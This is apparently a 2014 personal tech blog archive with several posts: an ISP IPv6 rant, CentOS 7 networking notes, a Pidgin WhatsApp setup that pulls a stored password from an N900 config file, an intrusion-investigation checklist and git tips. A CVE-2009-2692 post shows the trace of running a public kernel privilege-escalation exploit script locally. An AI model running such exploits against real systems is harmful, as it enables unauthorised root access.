Recently, with the support of dual stack IPv4 and IPv6, it is pretty exciting for a small country like Malaysia be in the fore runner for new technology like supporting IPv6. As myself been in I.T. technology for years, enabling this and learn more about IPv6 is definitely a must. With the abundance of IPv6 address, perhaps the ISP will be generous and knowledgable on topic of IPv6 since they announced supported on year 2013, and statically allocate a static IPv6 subnet for its user. Here goes the inquiry.
Hi, with the abundance of ipv6 addresses, can you assign a static ipv6 subnet for my router? thank you.
and the response from isp...
Referring to your report no : 1-1111111111 regarding on your issue. Upon checking with our respective department, kindly be inform that we unable to provide IPV6 setting / assist third party service. Please be advice to get second party service vendor / email administrator opinion to assist regarding your third party service configuration.
We hope the explanation has reverted to your concern. Your understanding on this matter is highly appreciated.
Honestly, after read the response, mixture feeling of awkward and/or feeling retard of this isp staffs just arouse! I can't stop the urge to write an article to bashing.
As always, we think positive and we want to appreciate what can be salvage for this. Firstly, omg, finally the isp response! :) I have filed cases of ipv6 in the isp router, why it is not supported. Guess what, 5 reports get close with no response. Hey, this is the first time they response! YAY! (asshole ;-) )
Apart from that, I can't think of any reasons other than just bashing. I summarize my thoughts in points.
1. WHY would configuration of IPv6 managed by a third party, second party or EMAIL ADMINISTRATOR ?! oh my fucking jesus christ, email administrator for the configuration?! LOL..
2. "Upon checking with our respective department", so what department actually get check?! toy story department?!
3. I am asking for static IPv6 subnet for my router. I am NOT asking for configuration problem.. ffs, is this idiot support drone even understand what the user asking? From the situation, apparently no. They do not even bother to ask for clarification and answer with second party service vendor/ email administrator as a answer...ROFLMAO.
4. Now why would I ask any third party to configure a static IPv6 ?! This assignment of static IP is done by ISP network admin. Not any third party, period. Well hey, if any third party can configure this in the ISP, and as a third party, can I reconfigure your whole network ?! :D
This ISP support has always been "amazing". I don't supposed even if I reply the response with explanation, that it will get solve technically or god grace static IPv6 subnet will be granted, justified based on past experience and knowledge know how.
Writing it down here and hopefully and believing that someone knowledgeable in the ISP will get the chance to read user response and for instance, in this case, knowledge enough to assign a static IPv6 subnet for its user.
We learn from community all over the world and we would like to contribute back. We hope to build a knowledge society and share interest on information technology topics through this site.
Saturday, September 13, 2014
How to check if Debian Jessie, Ubuntu Trusty, Nokia N900 if it IPv6 ready?
With recent rise of IPv6 usage, it is imperative that we understand if our devices are ready for IPv6. Linux kernel supported IPv6 as early as year 1996! Chances are, all these distributions should be IPv6 ready. But for the sake to be sure and learning the basic, we will check these distribution to be sure.
To check, launch a terminal and execute this command as a user.
You should see the above output and if you are not , maybe the kernel is not compile with ipv6 module. If so, you can enable it and check if it loaded.
# modprobe ipv6
# lsmod | grep ipv6
ipv6 237436 14
You can run the above commands for all the devices, they are all IPv6 ready.
There are many articles out there to disable IPv6 but with the depletion of IPv4 addresses, I think this practice should not continue but be ready and prepared for it. Of cause unless you got good reason not to use IPv6.
To check, launch a terminal and execute this command as a user.
$ cat /proc/net/if_inet6
fe80000000000000022401fffed782ea 03 40 20 80 eth2
00000000000000000000000000000001 01 80 10 80 lo
You should see the above output and if you are not , maybe the kernel is not compile with ipv6 module. If so, you can enable it and check if it loaded.
# modprobe ipv6
# lsmod | grep ipv6
ipv6 237436 14
You can run the above commands for all the devices, they are all IPv6 ready.
There are many articles out there to disable IPv6 but with the depletion of IPv4 addresses, I think this practice should not continue but be ready and prepared for it. Of cause unless you got good reason not to use IPv6.
Friday, September 12, 2014
Understand basic network configuration in CentOS 7
With the recent release of CentOS7, today we are going to check out the basic network configuration. My usual quick command, ifconfig.
it seem like ifconfig is not longer there, note that if you do upgrade from centos 6.x , you should be aware of this. If you are going to configure network interface, start to get familiar to command ip. But if you want command ifconfig, you can still install the package net-tools.
Let's restart network interface.
Noticed that service manager now is done via systemctl, C7 is using systemctl in replace of SysV. Also notice configuration file for ifcfg-lo is not loadable? This issue has been file here.
Upstream has changed the default networking service is provided by NetworkManager, which is a dynamic network control and configuration daemon that attempts to keep network devices and connections up and active when they are available.
If it does not install for any reason (which it should not because it comes with predefault installation), you can follow these commands
If you are configuring manually remotely, you can use command nmtui. nmtui is a simple curses-based text user interface. But if you want to configure interface using script, better still to use command ip or nmcli. For more information, you can read here.
That's it for this article. I would like to thank my buddy for kind enough to let me ssh and study centos 7 in his host. :) you know who you are! dankeschon!
[root@localhost ~]# ifconfig
-bash: ifconfig: command not found
it seem like ifconfig is not longer there, note that if you do upgrade from centos 6.x , you should be aware of this. If you are going to configure network interface, start to get familiar to command ip. But if you want command ifconfig, you can still install the package net-tools.
Let's restart network interface.
[root@centos7-test1 network-scripts]# service network restart
Restarting network (via systemctl): [ OK ]
[root@centos7-test1 network-scripts]# service network status
Configured devices:
lo eth0
Currently active devices:
lo eth0
[root@centos7-test1 init.d]# systemctl restart network
[root@centos7-test1 init.d]# systemctl status network
network.service - LSB: Bring up/down networking
Loaded: loaded (/etc/rc.d/init.d/network)
Active: active (exited) since Tue 2014-07-15 14:33:28 CEST; 13s ago
Process: 11597 ExecStop=/etc/rc.d/init.d/network stop (code=exited, status=0/SUCCESS)
Process: 11753 ExecStart=/etc/rc.d/init.d/network start (code=exited, status=0/SUCCESS)
Jul 15 14:33:27 centos7-test1 network[11753]: Bringing up loopback interface: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 network[11753]: Bringing up interface eth0: Connection successfully activated (D-Bus active path: /org/...tion/3)
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 systemd[1]: Started LSB: Bring up/down networking.
Hint: Some lines were ellipsized, use -l to show in full.
Noticed that service manager now is done via systemctl, C7 is using systemctl in replace of SysV. Also notice configuration file for ifcfg-lo is not loadable? This issue has been file here.
Upstream has changed the default networking service is provided by NetworkManager, which is a dynamic network control and configuration daemon that attempts to keep network devices and connections up and active when they are available.
If it does not install for any reason (which it should not because it comes with predefault installation), you can follow these commands
# # install it
# yum install NetworkManager
# # ensure network manager service is started everything system boot up.
# systemctl enable NetworkManager
# # manual start for now.
# systemctl start NetworkManager
# # check the status.
[root@centos7-test1 ~]# systemctl status NetworkManager
NetworkManager.service - Network Manager
Loaded: loaded (/usr/lib/systemd/system/NetworkManager.service; enabled)
Active: active (running) since Tue 2014-07-15 13:39:18 CEST; 3h 40min ago
Main PID: 679 (NetworkManager)
CGroup: /system.slice/NetworkManager.service
├─ 679 /usr/sbin/NetworkManager --no-daemon
└─11896 /sbin/dhclient -d -sf /usr/libexec/nm-dhcp-helper -pf /var/run/dhclient-eth0.pid -lf /var/lib/NetworkManager/dhclient-55911be2-9763-471f...
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: bound to 192.168.0.116 -- renewal in 3581 seconds.
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> (eth0): DHCPv4 state changed renew -> renew
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> address 192.168.0.116
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> plen 24 (255.255.255.0)
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> gateway 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> server identifier 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> lease time 7200
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '192.168.0.1'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '8.8.8.8'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> domain name 'PowerRanger'
If you are configuring manually remotely, you can use command nmtui. nmtui is a simple curses-based text user interface. But if you want to configure interface using script, better still to use command ip or nmcli. For more information, you can read here.
That's it for this article. I would like to thank my buddy for kind enough to let me ssh and study centos 7 in his host. :) you know who you are! dankeschon!
Sunday, August 31, 2014
How to setup pidgin WhatsApp using credential from Nokia n900
If you own a smart phone from Nokia, model n900, you are in luck to use WhatsApp
on your pc. The intention here is personal usage as sometime you ran out of
power in n900 whilst on a important conversation with friends. By setup up
whatsapp in pidgin messenger chatting software on linux, you can also save the
trouble of switch devices back and forth. This is intended for personal usage.
In this article, we are going to learn how to setup pidgin and so it can connect
to WhatsApp with the registration made in Nokia n900. Of cause, first, in n900,
you will need to install yappari, a whatsapp client for n900 and register yourself
an account in whatsapp. This article will not cover on how to install yappari
in n900 and getting an whatsapp account in yappari because it is very easy.
The official website of this plugin available here. At the bottom of the site, there are several links to the operating system.
If you do not want to go through the hassle of setting up apt repository , what you can do quickly is by
At this moment of writing, I'm using last-whatsapp.so on the server with date of
this file is 31-Jul-2014 01:02 of 313075 bytes. Meanwhile for pidgin, the version
I'm using in debian is Pidgin 2.10.9 (libpurple 2.10.9) and this works very well for
me.
Once pidgin restarted, go to Manage Accounts and then click on Add button. This is
to add the WhatsApp account that you have setup in yappari. In the pop up Add Account
window, under protocol field, there should be a new protocol WhatsApp available in the
drop down selection. Pick that.
For Username and Password is very tricky here.
Username will be the phone number that you registered in yappari and as for password, you will need some work to retrieve from yappari configuration file in n900. But we will goes through this step by step.
Let's start with the easy one. The username field. It will be your country code follow by your mobile number without the prefix plus sign. For instance, if your mobile sim card is malaysian registered, it will be something like.
Username: 60123456789
Because the password which I'm gonna show you later will be a difficult one, I suggest you check the button Remember password. Unless you are paranoid, you can try to remember your password. Your choice.
For the field Local alias, it will be your name, just put anything that you like to identify yourself.
Now onto the password field, if you notice during registration, there is no procedure nor password sent to you. The only verification WhatsApp need is to identify this is a valid registration when you register an account. Note that WhatsApp code that sent to your phone is not your password.
I have been following the tutorial like using wireshark and tcpdump to get the password, see the attached screen below. This is just not possible because the traffic is encrypted using ssl.
That's impossible to decode the traffic if you do not have good knowledge on ssl but that's the whole point of ssl encrypt the message in the transport. So retrieving password via sniffing on the network packet will not work. We will now go to n900 and retrieve the password.
That's it. Start sending WhatsApp message from your pc!
UPDATE
on your pc. The intention here is personal usage as sometime you ran out of
power in n900 whilst on a important conversation with friends. By setup up
whatsapp in pidgin messenger chatting software on linux, you can also save the
trouble of switch devices back and forth. This is intended for personal usage.
In this article, we are going to learn how to setup pidgin and so it can connect
to WhatsApp with the registration made in Nokia n900. Of cause, first, in n900,
you will need to install yappari, a whatsapp client for n900 and register yourself
an account in whatsapp. This article will not cover on how to install yappari
in n900 and getting an whatsapp account in yappari because it is very easy.
The official website of this plugin available here. At the bottom of the site, there are several links to the operating system.
- Windows/Linux: http://davidgf.net/nightly/whatsapp-purple/
- Ubuntu/Debian: https://launchpad.net/~whatsapp-purple/+archive/ubuntu/ppa
- Fedora: https://copr.fedoraproject.org/coprs/davidgf/whatsapp-purple/
- ArchLinux: https://aur.archlinux.org/packages/purple-whatsapp/
If you do not want to go through the hassle of setting up apt repository , what you can do quickly is by
- go to this link
- depending on what cpu architecture, if it is 64bit cpu, click on x64/ http://davidgf.net/nightly/whatsapp-purple/x64/
- pick the latest version, that is last-whatsapp.so and download to your computer.
- then with root access, copy the lib to pidgin plugin directory.
# cp last-whatsapp.so /usr/lib/purple-2 - restart your pidgin.
At this moment of writing, I'm using last-whatsapp.so on the server with date of
this file is 31-Jul-2014 01:02 of 313075 bytes. Meanwhile for pidgin, the version
I'm using in debian is Pidgin 2.10.9 (libpurple 2.10.9) and this works very well for
me.
Once pidgin restarted, go to Manage Accounts and then click on Add button. This is
to add the WhatsApp account that you have setup in yappari. In the pop up Add Account
window, under protocol field, there should be a new protocol WhatsApp available in the
drop down selection. Pick that.
For Username and Password is very tricky here.
Username will be the phone number that you registered in yappari and as for password, you will need some work to retrieve from yappari configuration file in n900. But we will goes through this step by step.
Let's start with the easy one. The username field. It will be your country code follow by your mobile number without the prefix plus sign. For instance, if your mobile sim card is malaysian registered, it will be something like.
Username: 60123456789
Because the password which I'm gonna show you later will be a difficult one, I suggest you check the button Remember password. Unless you are paranoid, you can try to remember your password. Your choice.
For the field Local alias, it will be your name, just put anything that you like to identify yourself.
Now onto the password field, if you notice during registration, there is no procedure nor password sent to you. The only verification WhatsApp need is to identify this is a valid registration when you register an account. Note that WhatsApp code that sent to your phone is not your password.
I have been following the tutorial like using wireshark and tcpdump to get the password, see the attached screen below. This is just not possible because the traffic is encrypted using ssl.
12:07:45.317453 IP (tos 0x0, ttl 64, id 29179, offset 0, flags [DF], proto TCP (6), length 60)
192.168.0.82.62751 > 208.43.122.151-static.reverse.softlayer.com.https: Flags [S], cksum 0x938f (correct), seq 416925910, win 5840, options [mss 1460,sackOK,TS val 2996526 ecr 0,nop,wscale 4], length 0
0x0000: 4500 003c 71fb 4000 4006 bd03 c0a8 0052 E..<q.@.@......R
0x0010: d02b 7a97 f51f 01bb 18d9 c8d6 0000 0000 .+z.............
0x0020: a002 16d0 938f 0000 0204 05b4 0402 080a ................
0x0030: 002d b92e 0000 0000 0103 0304 .-..........
12:07:46.135812 IP (tos 0x0, ttl 54, id 37650, offset 0, flags [DF], proto TCP (6), length 60)
208.43.122.151-static.reverse.softlayer.com.https > 192.168.0.82.62751: Flags [S.], cksum 0xb738 (correct), seq 2641574608, ack 416925911, win 65535, options [mss 1452,nop,wscale 9,sackOK,TS val 3690413789 ecr 2996526], length 0
0x0000: 4500 003c 9312 4000 3606 a5ec d02b 7a97 E..<..@.6....+z.
0x0010: c0a8 0052 01bb f51f 9d73 3ad0 18d9 c8d7 ...R.....s:.....
0x0020: a012 ffff b738 0000 0204 05ac 0103 0309 .....8..........
0x0030: 0402 080a dbf7 3edd 002d b92e ......>..-..
12:07:46.136301 IP (tos 0x0, ttl 64, id 29180, offset 0, flags [DF], proto TCP (6), length 52)
192.168.0.82.62751 > 208.43.122.151-static.reverse.softlayer.com.https: Flags [.], cksum 0xe429 (correct), seq 1, ack 1, win 365, options [nop,nop,TS val 2996630 ecr 3690413789], length 0
0x0000: 4500 0034 71fc 4000 4006 bd0a c0a8 0052 E..4q.@.@......R
0x0010: d02b 7a97 f51f 01bb 18d9 c8d7 9d73 3ad1 .+z..........s:.
0x0020: 8010 016d e429 0000 0101 080a 002d b996 ...m.).......-
That's impossible to decode the traffic if you do not have good knowledge on ssl but that's the whole point of ssl encrypt the message in the transport. So retrieving password via sniffing on the network packet will not work. We will now go to n900 and retrieve the password.
- open a X terminal in n900. (if you do not have, you should install now)
- change directory to .config/scorpius and check your current directory should be /home/user/.config/scorpius
$ cd .config/scorpius
$ pwd
/home/user/.config/scorpius - check current directory content with ls
$ ls
counters.conf yappari.conf yappari.log - what is important is yappari.conf where it contain the password that is needed. so cat yappari.conf
$ cat yappari.conf
[General]
whatsnew=555555555
imsi=502121212121212
registered=true
number=123456789
cc=60
phonenumber=60123456789
password="ABCDEFGHIJKLMNOPQRSTUVWXYZ/="
username=JohnSmith
creation=1407484663
expiration=1439020663
kind=free
accountstatus=active
lastsync=1407484676392
status=Available
lastimagedir=/home/user/MyDocs/DCIM
nextchallenge="APAPAPAPAPAPAPAPAPAPAPAPAPAP"
You will see similar content as of above, and you should copy and paste the password to your pidgin. Note, because it is long, you might want to copy this file out and copy and paste it.
Fill in the password from step 4 into pidgin password field. Note that below is just an example of demonstration, you should replace your own value.
Password: ABCDEFGHIJKLMNOPQRSTUVWXYZ/=
When you click the checkbox for 'Enabled' for your account, it should now connect.
WhatsApp has a smiley theme called emoji. So you might want to install that as WhatsApp users normally will send in emoji that pidgin will not able to decode and display as a rectangular box with hexadecimal. To install emoji for your what's app, you can follow these steps.
- read introduction at https://github.com/davidgfnet/whatsapp-purple/blob/master/README.md#how-do-i-get-graphical-whatsapp-smileys
- download the unicode-emoji and emoji-for-pidgin to your home directory.
- extract the zip files and copy the directory to your pidgin home.
$ cp -R android apple symbola $HOME/.purple/smileys
$ cp -R Emoji-for-Pidgin $HOME/.purple/smileys
$ ls $HOME/.purple/smileys
android apple Emoji-for-Pidgin symbola - restart your pidgin and go to Tools -> Preferences -> Themes.
- under Smiley Theme, select the emoji you want. :)
That's it. Start sending WhatsApp message from your pc!
UPDATE
If you have setup whatsapp on pidgin using this published article during the period on 31 August 2014 to 22 November 2014, you should really get the update again. Then in the setting for this whatsapp account in pidgin, under Advanced tab, in the resource field , change to Android-2.31.151-443. Restart pidgin and it should connect again.
Saturday, August 30, 2014
What should you do if the server you administered got hacked.
If you realized that your server has been compromised, this discovery will create confusion, reduce confidence and if the server is serving user requests, you have to declare down time. That's not good.
In order to restore service as quickly as possible, it is best if you have a server ready to replace instantly, that you can reduce the noise from the customers. But in order to prevent such attack coming in the future, you must at least identify how it happened and taking counter measurement.
In this article, we will learn how to discover, and then taking counter measure.
Quick solution.
Probably the quickest solution is to format and reinstall the operating system together with your applications that serve user requests. This probably is good if you do not have a backup server and you want to reinstate the server to serve user requests as soon as possible. But this does not solve the actual problem on how the hacked took place. Hence, it might happen again in the near future.
Long and workable solution.
identify your own custom application deployed and start to investigate from there.
Because open source are mostly tested well and updated often, the first place you are going to investigate mostly come from your own application. Hence, you must at least have good understanding about your app and so to quickly identify source of problem.
Following are a sets of commands which might able to help you in your investigation.
update the system using package manager and restart system.
First you can start by checking.
tighten up security and monitor
if you have a loose firewall policy (iptables or some hardware firewall), you should review it.
Prevention in the future would probably notify when the count of TCP connection exceed or suddenly spike to a threshold.
whilst these steps are not exhaustive, as evil people always come with different type attacks, thus you should be prepare and be alert. Gather information using google as well.
In order to restore service as quickly as possible, it is best if you have a server ready to replace instantly, that you can reduce the noise from the customers. But in order to prevent such attack coming in the future, you must at least identify how it happened and taking counter measurement.
In this article, we will learn how to discover, and then taking counter measure.
Quick solution.
Probably the quickest solution is to format and reinstall the operating system together with your applications that serve user requests. This probably is good if you do not have a backup server and you want to reinstate the server to serve user requests as soon as possible. But this does not solve the actual problem on how the hacked took place. Hence, it might happen again in the near future.
Long and workable solution.
- identify your own custom application deployed and start to investigate from there.
- update the system using package manager and restart system.
- tighten up security
identify your own custom application deployed and start to investigate from there.
Because open source are mostly tested well and updated often, the first place you are going to investigate mostly come from your own application. Hence, you must at least have good understanding about your app and so to quickly identify source of problem.
Following are a sets of commands which might able to help you in your investigation.
- w
who is on the server - sudo netstat -nalp | grep ":22"
change 22 to your application listen to. check if there is any abnormally. - if you are using opensource for your custom applications, check the log as well. For which attacker will always find the exploit for the opensource softwares and started to target those.
update the system using package manager and restart system.
First you can start by checking.
- last
check when was invalid last access. - cat /var/log/secure* | grep Accept
check invalid access. - ps -elf
check if the malware is running and if you spot one, get the process where it run from and delete all malware files. - ls /tmp /var/tmp /dev/shm -la
this directory normally allow process to write in, so you might want to check any fishy files here. - file <filename>
check what type of the file. - cat /etc/passwd
check if there is unknown entry which is not supposed to be there. - sudo netstat -plant |awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' |sort | uniq -c | sort -n| tail
4 ESTABLISHED java
4 LISTEN kadmind
5 LISTEN java
5 LISTEN python
6 ESTABLISHED python
if your server has been turned into a trojan, the malware will probably launching a lot of ddos, with this command, you should be able to identify if the cp connection has been spike. - sudo netstat -plant | awk '$4 ~ /:22$/ {print $5}' | cut -f1 -d: | sort | uniq -c | sort -n
1
1 0.0.0.0
2 192.168.0.2
check total connection established to your server on port 22. - sudo netstat -plant | awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
2 CLOSING
4 SYN_RECV
5 LAST_ACK
6 FIN_WAIT1
12 LISTEN
13 FIN_WAIT2
344 TIME_WAIT
977 ESTABLISHED
check network states, this is a good information should your server suddenly spike in the state established or state syn. if there is any spike, you will know something maybe gone fishy. - $HOME/.bash_history
check every users bash_history to see if there is any suspect. If the server application run user a user id, especially check the bash_history in the user home directory. - find / -mtime 5
find what files has been changes since 5 days ago.
If there is nothing found, just update the system packages using package manager and reboot the system.
tighten up security and monitor
if you have a loose firewall policy (iptables or some hardware firewall), you should review it.
Prevention in the future would probably notify when the count of TCP connection exceed or suddenly spike to a threshold.
whilst these steps are not exhaustive, as evil people always come with different type attacks, thus you should be prepare and be alert. Gather information using google as well.
Friday, August 29, 2014
Where to read branch work (or commits) in github?
Have you been stuck either of these situations:
Today, we are going to learn just that.
With command line, you can use git log. LEAD-451 is an example of my branch and it is here for illustration purposes but you should change to the branch you want to view.
this will show the changes including commit, author, date, message. If you notice, the order is chronological, with latest being to top and oldest at the bottom. You can use --reverse to see the oldest first.
If you want to see the file status, if you add --name-status to the command
.If you want to see the actual code changes, it is very intuitive, you use git diff. So
and you get a lengthy code different output between branch master and branch LEAD-451. If you want to generate a patch, you can give -p to the command. If you want to see what files change/add/delete between these two branches, you can add parameter --name-status or --name-only.
Enough for the command line, now we go for some visual representation. For this, I will illustrate using github.
With the same condition, in github, there is a feature called compare view.
https://github.com/Opentracker/luceneOnCassandra/compare/master...LEAD-451
As you can see on the bottom, the output is very much same with the command line we have tried before this. But github condense everything into one , very nice.
Assuming you are at your project landing page at github, how do you quickly get the compare view?
That's it, I hope you learned something and please donate as a mean to continue funding this blog maintenance. Thank you.
- a lot of times, when you do your works on branch, and as days passed, you wanna review your own codes by browsing through the history but no idea how?
- or maybe you want to let you colleague take a look at the work you have done and code review for you?
- or see the changes you made in the branch and write a change log before you merge back into the master branch.
Today, we are going to learn just that.
With command line, you can use git log. LEAD-451 is an example of my branch and it is here for illustration purposes but you should change to the branch you want to view.
git log master...LEAD-451
this will show the changes including commit, author, date, message. If you notice, the order is chronological, with latest being to top and oldest at the bottom. You can use --reverse to see the oldest first.
If you want to see the file status, if you add --name-status to the command
.If you want to see the actual code changes, it is very intuitive, you use git diff. So
git diff master...LEAD-451
and you get a lengthy code different output between branch master and branch LEAD-451. If you want to generate a patch, you can give -p to the command. If you want to see what files change/add/delete between these two branches, you can add parameter --name-status or --name-only.
Enough for the command line, now we go for some visual representation. For this, I will illustrate using github.
With the same condition, in github, there is a feature called compare view.
https://github.com/Opentracker/luceneOnCassandra/compare/master...LEAD-451
As you can see on the bottom, the output is very much same with the command line we have tried before this. But github condense everything into one , very nice.
Assuming you are at your project landing page at github, how do you quickly get the compare view?
- at the front page, https://github.com/Opentracker/luceneOnCassandra/
- click on the branch drop down, select the branch you want to diff. example LEAD-451
- at the page https://github.com/Opentracker/luceneOnCassandra/tree/LEAD-451, you can click on the compare button.
That's it, I hope you learned something and please donate as a mean to continue funding this blog maintenance. Thank you.
Sunday, August 17, 2014
CVE-2009-2692 Linux NULL pointer dereference due to incorrect proto_ops initializations
Again as same with previous cve posts, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.
This source (or you can download original source here) is written in c and it require some level of understanding into linux system as well. You should find explanation for the source exploit.c here, here or here. As explain in the documentation, this exploit mainly target this kernel version:
So check your system if your server kernel falled within this range and do a kernel update if it does as there is already fixed.
According to the cve, description for this exploit
The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.
Okay, let's download the source and try it.
So this server is not vulnerable for this exploit! All good.
This source (or you can download original source here) is written in c and it require some level of understanding into linux system as well. You should find explanation for the source exploit.c here, here or here. As explain in the documentation, this exploit mainly target this kernel version:
- kernel 2.6.0 to 2.6.30.4
- kernel 2.4.4 to 2.4.37.4
So check your system if your server kernel falled within this range and do a kernel update if it does as there is already fixed.
According to the cve, description for this exploit
The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.
Okay, let's download the source and try it.
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user
user@localhost:~/Desktop/exploit/wunderbar_emporium$ sh -x wunderbar_emporium.sh
++ pwd
++ sed 's/\//\\\//g'
+ ESCAPED_PWD='\/home\/user\/Desktop\/exploit\/wunderbar_emporium'
+ sed 's/\/home\/spender/\/home\/user\/Desktop\/exploit\/wunderbar_emporium/g' pwnkernel.c
+ mv pwnkernel.c pwnkernel2.c
+ mv pwnkernel1.c pwnkernel.c
+ killall -9 pulseaudio
++ uname -p
+ IS_64=unknown
+ OPT_FLAG=
+ '[' unknown = x86_64 ']'
++ cat /proc/sys/vm/mmap_min_addr
+ MINADDR=65536
+ '[' 65536 = '' -o 65536 = 0 ']'
+ '[' '!' -f /usr/sbin/getenforce ']'
+ cc -fno-stack-protector -fPIC -shared -o exploit.so exploit.c
+ cc -o pwnkernel pwnkernel.c
+ ./pwnkernel
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
+ mv -f pwnkernel2.c pwnkernel.c
user@localhostp:~/Desktop/exploit/wunderbar_emporium$ whoami
user
So this server is not vulnerable for this exploit! All good.
Subscribe to:
Posts (Atom)